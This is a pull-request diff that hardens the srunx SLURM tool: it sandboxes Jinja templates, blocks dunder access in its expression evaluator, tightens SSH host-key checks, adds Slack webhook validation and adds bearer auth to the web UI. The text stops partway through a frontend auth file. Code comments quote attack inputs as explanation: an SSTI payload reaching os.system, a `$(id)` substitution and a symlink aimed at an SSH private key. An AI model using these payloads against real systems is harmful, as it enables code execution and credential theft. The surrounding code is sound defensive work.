### PR TITLE
security: fix RCE, add Web auth, and harden SSH/config/logging (audit 2026-07)

### DIFF
--- a/src/srunx/cli/commands/ui.py
+++ b/src/srunx/cli/commands/ui.py
@@ -35,7 +35,6 @@ def ui(
     import uvicorn
 
     from srunx.web.config import get_web_config
-
     from srunx.web.security import InsecureBindError, assert_safe_bind
 
     config = get_web_config()

--- a/src/srunx/cli/commands/ui.py
+++ b/src/srunx/cli/commands/ui.py
@@ -36,10 +36,19 @@ def ui(
 
     from srunx.web.config import get_web_config
 
+    from srunx.web.security import InsecureBindError, assert_safe_bind
+
     config = get_web_config()
     config.host = host
     config.port = port
     config.verbose = verbose
+
+    # Refuse to expose an unauthenticated API on a non-loopback interface.
+    try:
+        assert_safe_bind(host, config.auth_token)
+    except InsecureBindError as e:
+        Console().print(f"[red]{e}[/red]")
+        raise typer.Exit(code=1) from e
 
     # Quiet mode: silence uvicorn access logs and demote srunx loguru to WARNING.
     if not verbose:

--- a/src/srunx/common/config.py
+++ b/src/srunx/common/config.py
@@ -377,6 +377,11 @@ def save_user_config(config: SrunxConfig) -> None:
 
     # Create directory if it doesn't exist
     user_config_path.parent.mkdir(parents=True, exist_ok=True)
+    # The config may hold SSH profile details; keep the dir private.
+    try:
+        user_config_path.parent.chmod(0o700)
+    except OSError:
+        pass
 
     # Load existing data to preserve non-SrunxConfig keys (e.g. SSH profiles)
     existing: dict[str, Any] = {}
@@ -396,6 +401,10 @@ def save_user_config(config: SrunxConfig) -> None:
     try:
         with open(user_config_path, "w", encoding="utf-8") as f:
             json.dump(existing, f, indent=2)
+        try:
+            user_config_path.chmod(0o600)
+        except OSError:
+            pass
         logger.info(f"Configuration saved to {user_config_path}")
     except OSError as e:
         logger.error(f"Failed to save config to {user_config_path}: {e}")

--- a/src/srunx/mcp/helpers.py
+++ b/src/srunx/mcp/helpers.py
@@ -108,9 +108,9 @@ def reject_python_prefix_in_yaml_file(yaml_path: str) -> None:
     so MCP validate/run/get share the same boundary. Missing/malformed files
     are left to downstream validation to report.
     """
-    import yaml
-
     from pathlib import Path
+
+    import yaml
 
     try:
         text = Path(yaml_path).read_text()

--- a/src/srunx/mcp/helpers.py
+++ b/src/srunx/mcp/helpers.py
@@ -96,3 +96,30 @@ def reject_python_prefix(payload: Any, *, source: str) -> None:
             f"{violation.source} at '{violation.path}' contains 'python:' "
             f"prefix which is not allowed: {violation.value!r}"
         )
+
+
+def reject_python_prefix_in_yaml_file(yaml_path: str) -> None:
+    """Apply the ``python:`` guard to a workflow file's own ``args`` section.
+
+    ``WorkflowRunner.from_yaml`` merges and evaluates the YAML file's ``args``
+    at load time, so guarding only the caller-supplied ``args`` override
+    (as :func:`reject_python_prefix` does) leaves the file's own args
+    unguarded. This mirrors the Web path's ``reject_python_prefix_in_yaml_args``
+    so MCP validate/run/get share the same boundary. Missing/malformed files
+    are left to downstream validation to report.
+    """
+    import yaml
+
+    from pathlib import Path
+
+    try:
+        text = Path(yaml_path).read_text()
+        data = yaml.safe_load(text)
+    except Exception:
+        return
+
+    if not isinstance(data, dict):
+        return
+    args = data.get("args")
+    if isinstance(args, dict):
+        reject_python_prefix(args, source="args")

--- a/src/srunx/mcp/tools/workflows.py
+++ b/src/srunx/mcp/tools/workflows.py
@@ -14,7 +14,12 @@ from typing import TYPE_CHECKING, Any
 import yaml
 
 from srunx.mcp.app import mcp
-from srunx.mcp.helpers import err, ok, reject_python_prefix
+from srunx.mcp.helpers import (
+    err,
+    ok,
+    reject_python_prefix,
+    reject_python_prefix_in_yaml_file,
+)
 
 if TYPE_CHECKING:
     from srunx.runtime.rendering import SubmissionRenderContext
@@ -120,6 +125,7 @@ def validate_workflow(yaml_path: str) -> dict[str, Any]:
     try:
         from srunx.runtime.workflow.runner import WorkflowRunner
 
+        reject_python_prefix_in_yaml_file(yaml_path)
         runner = WorkflowRunner.from_yaml(yaml_path)
         runner.workflow.validate()
 
@@ -254,6 +260,8 @@ def run_workflow(
 
         if args is not None:
             reject_python_prefix(args, source="args")
+        # Also guard the YAML file's own args, which from_yaml merges + evaluates.
+        reject_python_prefix_in_yaml_file(yaml_path)
 
         # Resolve the cluster from the explicit ``transport`` (never the
         # current profile). ``mount`` is orthogonal: it selects the
@@ -492,6 +500,7 @@ def get_workflow(yaml_path: str) -> dict[str, Any]:
 
         from srunx.runtime.workflow.runner import WorkflowRunner
 
+        reject_python_prefix_in_yaml_file(yaml_path)
         runner = WorkflowRunner.from_yaml(yaml_path)
 
         jobs_detail = []

--- a/src/srunx/observability/notifications/adapters/slack_webhook.py
+++ b/src/srunx/observability/notifications/adapters/slack_webhook.py
@@ -13,7 +13,10 @@ from typing import Any
 from slack_sdk import WebhookClient
 
 from srunx.observability.notifications.adapters.base import DeliveryError
-from srunx.observability.notifications.sanitize import sanitize_slack_text
+from srunx.observability.notifications.sanitize import (
+    is_valid_slack_webhook_url,
+    sanitize_slack_text,
+)
 from srunx.observability.storage.models import Event
 
 
@@ -40,6 +43,14 @@ class SlackWebhookAdapter:
         if not webhook_url or not isinstance(webhook_url, str):
             raise DeliveryError(
                 "slack_webhook endpoint config is missing 'webhook_url'"
+            )
+        # Re-validate at delivery time: rows can reach the DB from paths that
+        # did not enforce the regex (e.g. the config bootstrap migration), so
+        # never POST to an arbitrary/internal URL just because it is stored.
+        if not is_valid_slack_webhook_url(webhook_url):
+            raise DeliveryError(
+                "slack_webhook endpoint has an invalid webhook_url "
+                "(must be https://hooks.slack.com/services/.../.../...)"
             )
 
         text, blocks = self._build_message(event)

--- a/src/srunx/observability/notifications/formatting.py
+++ b/src/srunx/observability/notifications/formatting.py
@@ -274,12 +274,15 @@ class SlackNotificationFormatter:
 
         # Prepare table data
         headers = ["ID", "Name", "Status", "Runtime", "GPU"]
+        # Sanitize user-controlled fields (job name is attacker-settable): a
+        # backtick or newline would otherwise break out of the ``` code fence
+        # and inject fake rows into the report.
         rows = [
             [
                 str(job.get("id", "-")),
-                job.get("name", "-")[:15],
-                job.get("status", "-")[:10],
-                job.get("runtime", "-")[:8],
+                self.table._sanitize_text(str(job.get("name", "-")))[:15],
+                self.table._sanitize_text(str(job.get("status", "-")))[:10],
+                self.table._sanitize_text(str(job.get("runtime", "-")))[:8],
                 str(job.get("gpus", "-")),
             ]
             for job in jobs

--- a/src/srunx/observability/notifications/sanitize.py
+++ b/src/srunx/observability/notifications/sanitize.py
@@ -7,6 +7,21 @@ so both the CLI-side ``SlackCallback`` and the new
 
 from __future__ import annotations
 
+import re
+
+# Canonical Slack Incoming Webhook URL pattern. Shared by the Web endpoint
+# router (create/update), the delivery adapter (send time), and the config
+# bootstrap migration so every path that stores or POSTs a webhook applies the
+# same anti-SSRF check.
+SLACK_WEBHOOK_URL_RE = re.compile(
+    r"^https://hooks\.slack\.com/services/[A-Za-z0-9_-]+/[A-Za-z0-9_-]+/[A-Za-z0-9_-]+$"
+)
+
+
+def is_valid_slack_webhook_url(url: object) -> bool:
+    """Return True iff ``url`` is a well-formed Slack Incoming Webhook URL."""
+    return isinstance(url, str) and SLACK_WEBHOOK_URL_RE.match(url) is not None
+
 
 def sanitize_slack_text(text: str) -> str:
     """Sanitize text for safe use in Slack messages.

--- a/src/srunx/observability/storage/migrations.py
+++ b/src/srunx/observability/storage/migrations.py
@@ -894,6 +894,17 @@ def bootstrap_from_config(conn: sqlite3.Connection, config: Any) -> bool:
     except AttributeError:
         webhook_url = None
 
+    # Only migrate a well-formed Slack webhook URL. A malformed / internal URL
+    # in local config must not be silently promoted into an endpoint the
+    # DeliveryPoller would later POST to (anti-SSRF).
+    if webhook_url is not None:
+        from srunx.observability.notifications.sanitize import (
+            is_valid_slack_webhook_url,
+        )
+
+        if not is_valid_slack_webhook_url(webhook_url):
+            webhook_url = None
+
     # Case: nothing to migrate — still record so we don't re-read next time.
     if not webhook_url:
         conn.execute(

--- a/src/srunx/runtime/rendering.py
+++ b/src/srunx/runtime/rendering.py
@@ -31,6 +31,7 @@ from rich.syntax import Syntax
 
 from srunx.common.logging import get_logger
 from srunx.domain import Job, JobEnvironment, RunnableJobType, ShellJob, Workflow
+from srunx.runtime.security import sandboxed_template
 from srunx.runtime.templates import get_template_path
 
 # NOTE: ``srunx.runtime.workflow.runner`` is imported lazily inside
@@ -499,7 +500,7 @@ def _render_base_script(
     # default behaviour, every script ending in ``\n`` (i.e. every
     # POSIX-conforming shell script) compared as different and the
     # in-place path was effectively dead. Codex blocker #2 on PR #141.
-    template = jinja2.Template(
+    template = sandboxed_template(
         template_content,
         undefined=jinja2.StrictUndefined,
         keep_trailing_newline=True,

--- a/src/srunx/runtime/security/__init__.py
+++ b/src/srunx/runtime/security/__init__.py
@@ -8,10 +8,12 @@ from srunx.runtime.security.python_args import (
     PythonPrefixViolation,
     find_python_prefix,
 )
+from srunx.runtime.security.templating import sandboxed_template
 
 __all__ = [
     "PythonPrefixViolation",
     "ShellJobScriptViolation",
     "find_python_prefix",
     "find_shell_script_violation",
+    "sandboxed_template",
 ]

--- a/src/srunx/runtime/security/templating.py
+++ b/src/srunx/runtime/security/templating.py
@@ -1,0 +1,34 @@
+"""Sandboxed Jinja2 rendering for workflow args / job fields / scripts.
+
+Workflow YAML (args, exports, job fields, ShellJob scripts) is rendered with
+Jinja2. A plain :class:`jinja2.Environment` permits dunder traversal such as
+``{{ cycler.__init__.__globals__['os'].system(...) }}`` — a textbook SSTI that
+yields arbitrary code execution and bypasses the ``python:``-prefix guard
+entirely (a ``{{ }}`` payload has no ``python:`` prefix). Every workflow-path
+template must therefore be built from a :class:`SandboxedEnvironment`, which
+blocks unsafe attribute access.
+"""
+
+import jinja2
+from jinja2.sandbox import SandboxedEnvironment
+
+
+def sandboxed_template(
+    source: str,
+    *,
+    undefined: type[jinja2.Undefined] = jinja2.Undefined,
+    keep_trailing_newline: bool = False,
+) -> jinja2.Template:
+    """Compile ``source`` into a template bound to a sandboxed environment.
+
+    Drop-in replacement for ``jinja2.Template(source, undefined=..., ...)`` in
+    the workflow rendering path. ``autoescape`` is intentionally ``False``:
+    the output is shell/YAML text, not HTML, and the sandbox — not escaping —
+    is what prevents code execution.
+    """
+    env = SandboxedEnvironment(
+        undefined=undefined,
+        keep_trailing_newline=keep_trailing_newline,
+        autoescape=False,
+    )
+    return env.from_string(source)

--- a/src/srunx/runtime/workflow/loader.py
+++ b/src/srunx/runtime/workflow/loader.py
@@ -12,6 +12,7 @@ from typing import Any
 import jinja2
 
 from srunx.common.logging import get_logger
+from srunx.runtime.security import sandboxed_template
 from srunx.runtime.workflow.safe_eval import _safe_eval, _safe_exec
 
 logger = get_logger(__name__)
@@ -71,21 +72,29 @@ class _DepsNamespace:
     def __init__(self, data: dict[str, Any]):
         self._data = data
 
+    def _lookup(self, name: str) -> Any:
+        value = self._data[name]
+        if isinstance(value, dict):
+            return _DepsNamespace(value)
+        return value
+
     def __getattr__(self, name: str) -> Any:
         try:
-            value = self._data[name]
+            return self._lookup(name)
         except KeyError as exc:
             raise AttributeError(
                 f"'deps' has no entry '{name}'. "
                 "Check that it is listed in this job's 'depends_on' "
                 "and that the referenced key is declared in the parent's 'exports'."
             ) from exc
-        if isinstance(value, dict):
-            return _DepsNamespace(value)
-        return value
 
     def __getitem__(self, name: str) -> Any:
-        return self.__getattr__(name)
+        # Raise KeyError (a LookupError), NOT AttributeError: Jinja's
+        # SandboxedEnvironment.getattr falls back to subscripting when attribute
+        # access fails and only catches (TypeError, LookupError) before yielding
+        # a StrictUndefined. An AttributeError here would escape unwrapped
+        # instead of surfacing as a clean load-time validation error.
+        return self._lookup(name)
 
     def __contains__(self, name: str) -> bool:
         return name in self._data
@@ -124,7 +133,7 @@ def _find_required_variables(jobs_yaml: str, args: dict[str, Any]) -> set[str]:
 
 def _eval_python_var(code_raw: str, evaluated: dict[str, Any]) -> Any:
     """Evaluate a single python: variable value."""
-    code = jinja2.Template(code_raw, undefined=jinja2.DebugUndefined).render(
+    code = sandboxed_template(code_raw, undefined=jinja2.DebugUndefined).render(
         **evaluated
     )
     code = dedent(code).lstrip()
@@ -196,7 +205,7 @@ def _evaluate_variables(args: dict[str, Any], required: set[str]) -> dict[str, A
             value = plain[key]
             refs = _find_jinja_refs(value)
             if refs:
-                tmpl = jinja2.Template(value, undefined=jinja2.DebugUndefined)
+                tmpl = sandboxed_template(value, undefined=jinja2.DebugUndefined)
                 evaluated[key] = tmpl.render(**evaluated)
             else:
                 evaluated[key] = value

--- a/src/srunx/runtime/workflow/runner.py
+++ b/src/srunx/runtime/workflow/runner.py
@@ -20,6 +20,7 @@ import yaml  # type: ignore
 from srunx.callbacks import Callback
 from srunx.common.exceptions import WorkflowValidationError
 from srunx.common.logging import get_logger
+from srunx.runtime.security import sandboxed_template
 from srunx.domain import (
     DependencyType,
     Job,
@@ -264,7 +265,9 @@ class WorkflowRunner:
 
             job_yaml = yaml.dump(raw, default_flow_style=False)
             try:
-                template = jinja2.Template(job_yaml, undefined=jinja2.StrictUndefined)
+                template = sandboxed_template(
+                    job_yaml, undefined=jinja2.StrictUndefined
+                )
                 rendered_yaml = template.render(**context)
             except jinja2.TemplateError as e:
                 raise WorkflowValidationError(

--- a/src/srunx/runtime/workflow/runner.py
+++ b/src/srunx/runtime/workflow/runner.py
@@ -20,7 +20,6 @@ import yaml  # type: ignore
 from srunx.callbacks import Callback
 from srunx.common.exceptions import WorkflowValidationError
 from srunx.common.logging import get_logger
-from srunx.runtime.security import sandboxed_template
 from srunx.domain import (
     DependencyType,
     Job,
@@ -31,6 +30,7 @@ from srunx.domain import (
     ShellJob,
     Workflow,
 )
+from srunx.runtime.security import sandboxed_template
 from srunx.runtime.workflow.loader import (
     _dependency_closure,
     _DepsNamespace,

--- a/src/srunx/runtime/workflow/safe_eval.py
+++ b/src/srunx/runtime/workflow/safe_eval.py
@@ -102,6 +102,14 @@ def _eval_node(node: ast.AST, local_vars: dict[str, Any]) -> Any:  # noqa: C901,
 
     # Attribute access (only on allowlisted modules)
     if isinstance(node, ast.Attribute):
+        # Never allow dunder / private attribute access. This is the primary
+        # sandbox boundary: without it, `datetime.__builtins__` (datetime is a
+        # pure-Python module) exposes the full builtins dict, from which
+        # `exec`/`eval`/`__import__` give arbitrary code execution.
+        if node.attr.startswith("_"):
+            raise AttributeError(
+                f"Attribute '{node.attr}' is not allowed in python: args"
+            )
         obj = _eval_node(node.value, local_vars)
         # Only allow attribute access on allowlisted modules and their results
         if obj in _SAFE_MODULES.values() or type(obj).__module__ in (

--- a/src/srunx/slurm/clients/local.py
+++ b/src/srunx/slurm/clients/local.py
@@ -753,10 +753,13 @@ class LocalClient:
             f"{job_id_str}.log",
         ]
         patterns = [p for p in potential_log_patterns if p is not None]
+        # Deliberately excludes /tmp: it is world-writable on shared login
+        # nodes, so another user could plant `*_<jobid>.log` (or a symlink to
+        # a file we can read) and have us read/print it. Restrict discovery to
+        # the operator-configured log dir and the user's own cwd.
         log_dirs = [
             os.environ.get("SLURM_LOG_DIR", ""),
             "./",
-            "/tmp",
         ]
 
         found_files: list[str] = []
@@ -785,7 +788,11 @@ class LocalClient:
 
         primary_log = found_files[0]
         try:
-            with open(primary_log, encoding="utf-8") as f:
+            # O_NOFOLLOW: refuse to follow a symlink at the final path
+            # component, so a planted `*_<jobid>.log -> ~/.ssh/id_rsa` symlink
+            # cannot redirect us into an unrelated file.
+            fd = os.open(primary_log, os.O_RDONLY | os.O_NOFOLLOW)
+            with os.fdopen(fd, encoding="utf-8") as f:
                 output_content = f.read()
         except (OSError, UnicodeDecodeError) as e:
             logger.warning(f"Failed to read log file {primary_log}: {e}")

--- a/src/srunx/ssh/core/config.py
+++ b/src/srunx/ssh/core/config.py
@@ -116,6 +116,12 @@ class ConfigManager:
     def _get_default_config_path(self) -> Path:
         config_dir = Path.home() / ".config" / "srunx"
         config_dir.mkdir(parents=True, exist_ok=True)
+        # SSH profiles (hostnames, usernames, key paths) must not be
+        # world-readable on shared login nodes.
+        try:
+            config_dir.chmod(0o700)
+        except OSError:
+            pass
         return config_dir / "config.json"
 
     def load_config(self) -> None:
@@ -175,6 +181,10 @@ class ConfigManager:
 
             with open(self.config_path, "w") as f:
                 json.dump(existing, f, indent=2)
+            try:
+                Path(self.config_path).chmod(0o600)
+            except OSError:
+                pass
         except OSError as e:
             raise RuntimeError(
                 f"Failed to save config to {self.config_path}: {e}"

--- a/src/srunx/ssh/core/connection.py
+++ b/src/srunx/ssh/core/connection.py
@@ -15,6 +15,7 @@ import paramiko  # type: ignore
 from srunx.common.logging import get_logger
 
 from .proxy_client import ProxySSHClient, create_proxy_aware_connection
+from .utils import configure_host_key_verification
 
 _logger = get_logger(__name__)
 
@@ -71,8 +72,7 @@ class SSHConnection:
                 )
             else:
                 self.ssh_client = paramiko.SSHClient()
-                self.ssh_client.load_system_host_keys()
-                self.ssh_client.set_missing_host_key_policy(paramiko.WarningPolicy())
+                configure_host_key_verification(self.ssh_client)
 
                 if self.key_filename:
                     self.ssh_client.connect(

--- a/src/srunx/ssh/core/proxy_client.py
+++ b/src/srunx/ssh/core/proxy_client.py
@@ -5,6 +5,7 @@ import paramiko
 from srunx.common.logging import get_logger
 
 from .ssh_config import SSHHost, get_ssh_config_host
+from .utils import configure_host_key_verification
 
 _logger = get_logger(__name__)
 
@@ -24,8 +25,7 @@ class ProxySSHClient:
         try:
             # Connect to proxy host
             self.proxy_client = paramiko.SSHClient()
-            self.proxy_client.load_system_host_keys()
-            self.proxy_client.set_missing_host_key_policy(paramiko.WarningPolicy())
+            configure_host_key_verification(self.proxy_client)
 
             proxy_connect_kwargs = {
                 "hostname": proxy_host_config.hostname,
@@ -90,8 +90,7 @@ class ProxySSHClient:
 
         # Connect to target through proxy
         target_client = paramiko.SSHClient()
-        target_client.load_system_host_keys()
-        target_client.set_missing_host_key_policy(paramiko.WarningPolicy())
+        configure_host_key_verification(target_client)
 
         # Create transport over proxy channel
         target_transport = paramiko.Transport(proxy_channel)
@@ -152,8 +151,7 @@ def create_proxy_aware_connection(
     if not proxy_jump:
         # Direct connection
         client = paramiko.SSHClient()
-        client.load_system_host_keys()
-        client.set_missing_host_key_policy(paramiko.WarningPolicy())
+        configure_host_key_verification(client)
         client.connect(
             hostname=hostname, username=username, key_filename=key_filename, port=port
         )

--- a/src/srunx/ssh/core/slurm.py
+++ b/src/srunx/ssh/core/slurm.py
@@ -312,7 +312,13 @@ class SlurmRemoteClient:
             final_command = f"{env_setup} && {command}"
 
         full_cmd = f"bash -l -c {shlex.quote(final_command)}"
-        self.logger.debug(f"Executing SLURM command: {_redact_exports(full_cmd)}")
+        # Redact BEFORE the outer shlex.quote: quoting rewrites the inner
+        # `export KEY='...'` single quotes into `'"'"'` sequences the regex
+        # can't match, so redact the unquoted command then re-quote for display.
+        self.logger.debug(
+            "Executing SLURM command: "
+            f"bash -l -c {shlex.quote(_redact_exports(final_command))}"
+        )
         stdout, stderr, exit_code = self._conn.execute_command(full_cmd)
         self.logger.debug(
             f"SLURM command result: exit_code={exit_code}, stdout_len={len(stdout)}, stderr_len={len(stderr)}"

--- a/src/srunx/ssh/core/slurm.py
+++ b/src/srunx/ssh/core/slurm.py
@@ -312,9 +312,7 @@ class SlurmRemoteClient:
             final_command = f"{env_setup} && {command}"
 
         full_cmd = f"bash -l -c {shlex.quote(final_command)}"
-        self.logger.debug(
-            f"Executing SLURM command: {_redact_exports(full_cmd)}"
-        )
+        self.logger.debug(f"Executing SLURM command: {_redact_exports(full_cmd)}")
         stdout, stderr, exit_code = self._conn.execute_command(full_cmd)
         self.logger.debug(
             f"SLURM command result: exit_code={exit_code}, stdout_len={len(stdout)}, stderr_len={len(stderr)}"

--- a/src/srunx/ssh/core/slurm.py
+++ b/src/srunx/ssh/core/slurm.py
@@ -21,9 +21,21 @@ if TYPE_CHECKING:
 # Imported at module level so the facade can reference it
 from .client_types import SlurmJob  # noqa: F401  re-exported for convenience
 from .secret_store import RemoteSecretStore
-from .utils import query_slurm_job_state
+from .utils import query_slurm_job_state, quote_shell_path
 
 _logger = get_logger(__name__)
+
+# Valid POSIX shell environment-variable name.
+_ENV_KEY_RE = re.compile(r"[A-Za-z_][A-Za-z0-9_]*")
+
+# Redacts `export KEY='value'` values in log output so job --env secrets never
+# reach a debug sink. Sourced-secret-file lines carry no inline values.
+_EXPORT_REDACT_RE = re.compile(r"(export\s+[A-Za-z_][A-Za-z0-9_]*=')(?:[^']|'\\'')*'")
+
+
+def _redact_exports(command: str) -> str:
+    """Mask inline ``export KEY='...'`` values for safe logging."""
+    return _EXPORT_REDACT_RE.sub(r"\1***'", command)
 
 
 class SlurmRemoteClient:
@@ -218,6 +230,15 @@ class SlurmRemoteClient:
             )
 
         for key, value in (job_env_vars or {}).items():
+            # Defense-in-depth: the key is interpolated into `export {key}=...`
+            # which runs under `bash -l -c`, so a non-identifier key would be
+            # shell-injected. Callers via JobEnvironment already validate, but
+            # this boundary must not trust that.
+            if not _ENV_KEY_RE.fullmatch(key):
+                raise ValueError(
+                    f"Invalid environment variable name {key!r}: must match "
+                    "[A-Za-z_][A-Za-z0-9_]*"
+                )
             escaped_value = value.replace("'", "'\\''")
             env_commands.append(f"export {key}='{escaped_value}'")
             self.logger.debug(f"Adding job environment variable: {key}")
@@ -291,7 +312,9 @@ class SlurmRemoteClient:
             final_command = f"{env_setup} && {command}"
 
         full_cmd = f"bash -l -c {shlex.quote(final_command)}"
-        self.logger.debug(f"Executing SLURM command: {full_cmd}")
+        self.logger.debug(
+            f"Executing SLURM command: {_redact_exports(full_cmd)}"
+        )
         stdout, stderr, exit_code = self._conn.execute_command(full_cmd)
         self.logger.debug(
             f"SLURM command result: exit_code={exit_code}, stdout_len={len(stdout)}, stderr_len={len(stderr)}"
@@ -350,7 +373,7 @@ class SlurmRemoteClient:
                 if not re.fullmatch(r"[a-z]+:\d+(,[a-z]+:\d+)*", dependency):
                     raise ValueError(f"Invalid dependency format: {dependency!r}")
                 cmd += f" --dependency={dependency}"
-            cmd += f" {remote_script_path}"
+            cmd += f" {quote_shell_path(remote_script_path)}"
 
             stdout, stderr, exit_code = self.execute_slurm_command(
                 cmd, job_env_vars=job_env_vars, source_secret=secret_present
@@ -388,7 +411,7 @@ class SlurmRemoteClient:
                 cmd = f"{self._get_slurm_command('sbatch')}"
                 cmd += f" -J {safe_name}"
                 cmd += " -o $SLURM_LOG_DIR/%x_%j.log"
-                cmd += f" {remote_path}"
+                cmd += f" {quote_shell_path(remote_path)}"
 
                 stdout, stderr, exit_code = self.execute_slurm_command(cmd)
                 if exit_code == 0:

--- a/src/srunx/ssh/core/utils.py
+++ b/src/srunx/ssh/core/utils.py
@@ -6,12 +6,48 @@ instance state, so they live here as plain module-level functions.
 
 from __future__ import annotations
 
+import os
 import re
 import shlex
 import subprocess
 from collections.abc import Callable
 from pathlib import Path
 from typing import Any
+
+import paramiko
+
+
+def configure_host_key_verification(client: paramiko.SSHClient) -> None:
+    """Load known host keys and set the missing-host-key policy on ``client``.
+
+    Loads both the system host-keys file and the user's ``~/.ssh/known_hosts``
+    so a host already pinned there is verified and a key **mismatch** is
+    rejected by paramiko regardless of policy. The policy below only governs
+    *unknown* (not-yet-seen) hosts:
+
+    - ``reject`` (default): refuse unknown hosts (OpenSSH ``StrictHostKeyChecking=yes``).
+      For the common case — connecting to your own cluster you've already
+      ``ssh``'d to — the host is in ``known_hosts`` and this never fires.
+    - ``accept-new``: trust-on-first-use; add + persist the new key.
+    - ``warn``: legacy behaviour — accept unknown keys with only a warning.
+
+    Override via ``SRUNX_SSH_HOST_KEY_POLICY``.
+    """
+    client.load_system_host_keys()
+    user_known_hosts = os.path.expanduser("~/.ssh/known_hosts")
+    if os.path.exists(user_known_hosts):
+        try:
+            client.load_host_keys(user_known_hosts)
+        except OSError:
+            pass
+
+    policy = os.environ.get("SRUNX_SSH_HOST_KEY_POLICY", "reject").strip().lower()
+    if policy == "accept-new":
+        client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
+    elif policy == "warn":
+        client.set_missing_host_key_policy(paramiko.WarningPolicy())
+    else:
+        client.set_missing_host_key_policy(paramiko.RejectPolicy())
 
 # scontrol prints whitespace-separated ``Key=Value`` tokens; ``JobState=`` is
 # the observed state (e.g. RUNNING, COMPLETED) and ``ExitCode=N:M`` carries
@@ -29,13 +65,16 @@ _JOB_ID_RE = re.compile(r"^[0-9]+([._][A-Za-z0-9_-]+)?$")
 def quote_shell_path(path: str) -> str:
     """Quote a path for remote shell, handling ~ expansion.
 
-    shlex.quote prevents ~ expansion, so paths starting with ~/
-    are converted to use $HOME with double quotes instead.
+    ``shlex.quote`` prevents ``~`` expansion, so paths starting with ``~/``
+    keep a literal ``$HOME`` prefix (expanded remotely) while the suffix is
+    single-quoted. Using ``shlex.quote`` on the suffix — rather than wrapping
+    the whole thing in double quotes — is what makes it injection-safe:
+    ``"$HOME/"'sub/$(id)'`` leaves ``$(id)``/backticks inside single quotes,
+    so they are never command-substituted.
     """
     if path.startswith("~/"):
-        # Double quotes allow $HOME expansion while preventing word splitting
         suffix = path[2:]
-        return '"$HOME/' + suffix + '"'
+        return '"$HOME/"' + shlex.quote(suffix)
     return shlex.quote(path)
 
 

--- a/src/srunx/ssh/core/utils.py
+++ b/src/srunx/ssh/core/utils.py
@@ -49,6 +49,7 @@ def configure_host_key_verification(client: paramiko.SSHClient) -> None:
     else:
         client.set_missing_host_key_policy(paramiko.RejectPolicy())
 
+
 # scontrol prints whitespace-separated ``Key=Value`` tokens; ``JobState=`` is
 # the observed state (e.g. RUNNING, COMPLETED) and ``ExitCode=N:M`` carries
 # the process exit code (N) and terminating signal (M). Match until the next

--- a/src/srunx/sync/rsync.py
+++ b/src/srunx/sync/rsync.py
@@ -227,7 +227,15 @@ class RsyncClient:
         if self.ssh_config_path:
             parts.extend(["-F", self.ssh_config_path])
 
-        parts.extend(["-o", "StrictHostKeyChecking=accept-new"])
+        # Host-key strictness mirrors the paramiko path (same env var). Default
+        # is strict: a host already in known_hosts is required, blocking
+        # first-contact MITM. Opt into TOFU with SRUNX_SSH_HOST_KEY_POLICY=accept-new.
+        policy = os.environ.get("SRUNX_SSH_HOST_KEY_POLICY", "reject").strip().lower()
+        strict_value = {
+            "accept-new": "accept-new",
+            "warn": "no",
+        }.get(policy, "yes")
+        parts.extend(["-o", f"StrictHostKeyChecking={strict_value}"])
         parts.extend(["-o", "BatchMode=yes"])
 
         return parts

--- a/src/srunx/web/app.py
+++ b/src/srunx/web/app.py
@@ -25,7 +25,6 @@ from srunx.ssh.core.config import MountConfig
 
 from .config import get_web_config
 from .deps import set_adapter
-from .security import WebSecurityMiddleware, assert_safe_bind
 from .routers import deliveries as deliveries_router
 from .routers import endpoints as endpoints_router
 from .routers import (
@@ -38,6 +37,7 @@ from .routers import (
 from .routers import subscriptions as subscriptions_router
 from .routers import sweep_runs as sweep_runs_router
 from .routers import watches as watches_router
+from .security import WebSecurityMiddleware, assert_safe_bind
 
 _FRONTEND_DIST = Path(__file__).parent / "frontend" / "dist"
 logger = get_logger(__name__)

--- a/src/srunx/web/app.py
+++ b/src/srunx/web/app.py
@@ -25,6 +25,7 @@ from srunx.ssh.core.config import MountConfig
 
 from .config import get_web_config
 from .deps import set_adapter
+from .security import WebSecurityMiddleware, assert_safe_bind
 from .routers import deliveries as deliveries_router
 from .routers import endpoints as endpoints_router
 from .routers import (
@@ -536,6 +537,14 @@ def create_app() -> FastAPI:
         allow_headers=["*"],
     )
 
+    # Anti-DNS-rebinding (Host header) + optional bearer token on /api/*.
+    app.add_middleware(
+        WebSecurityMiddleware,
+        auth_token=config.auth_token,
+        bind_host=config.host,
+        allowed_hosts=config.allowed_hosts,
+    )
+
     # REST routers
     from .routers import config as config_router
     from .routers import templates
@@ -581,6 +590,7 @@ def main() -> None:
     import uvicorn
 
     config = get_web_config()
+    assert_safe_bind(config.host, config.auth_token)
     uvicorn.run(
         "srunx.web.app:create_app",
         factory=True,

--- a/src/srunx/web/config.py
+++ b/src/srunx/web/config.py
@@ -13,6 +13,23 @@ class WebConfig(BaseModel):
     port: int = Field(default=8000)
     cors_origins: list[str] = Field(default_factory=lambda: ["http://localhost:3000"])
 
+    # Optional bearer token required on all /api/* routes. Unset by default so
+    # the local (127.0.0.1) experience is unchanged; required when exposing the
+    # server on a non-loopback host. Set via SRUNX_WEB_TOKEN.
+    auth_token: str | None = Field(
+        default_factory=lambda: os.getenv("SRUNX_WEB_TOKEN") or None
+    )
+    # Extra Host header values accepted by the anti-DNS-rebinding check
+    # (loopback names are always allowed). Set via SRUNX_WEB_ALLOWED_HOSTS
+    # (comma-separated).
+    allowed_hosts: list[str] = Field(
+        default_factory=lambda: [
+            h.strip()
+            for h in os.getenv("SRUNX_WEB_ALLOWED_HOSTS", "").split(",")
+            if h.strip()
+        ]
+    )
+
     # SSH connection — either profile_name or (hostname + username)
     ssh_profile: str | None = Field(
         default_factory=lambda: os.getenv("SRUNX_SSH_PROFILE")

--- a/src/srunx/web/frontend/src/lib/auth.ts
+++ b/src/srunx/web/frontend/src/lib/auth.ts
@@ -1,0 +1,95 @@
+// Bearer-token support for network-exposed servers.
+//
+// When the backend is started with SRUNX_WEB_TOKEN set (required by
+// `assert_safe_bind` for a non-loopback `srunx ui --host ...`), every /api/*
+// request must carry `Authorization: Bearer <token>`. The default local
+// (127.0.0.1, no token) deployment needs none of this — the interceptor is a
+// no-op when no token is known and the server never returns 401.
+//
+// The token is obtained from a `?token=...` URL parameter (then persisted and
+// stripped from the URL) or from localStorage, and the user is prompted once
+// on the first 401.
+
+const TOKEN_KEY = "srunx_web_token";
+
+let token: string | null = null;
+
+function loadToken(): string | null {
+  try {
+    const url = new URL(window.location.href);
+    const fromUrl = url.searchParams.get("token");
+    if (fromUrl) {
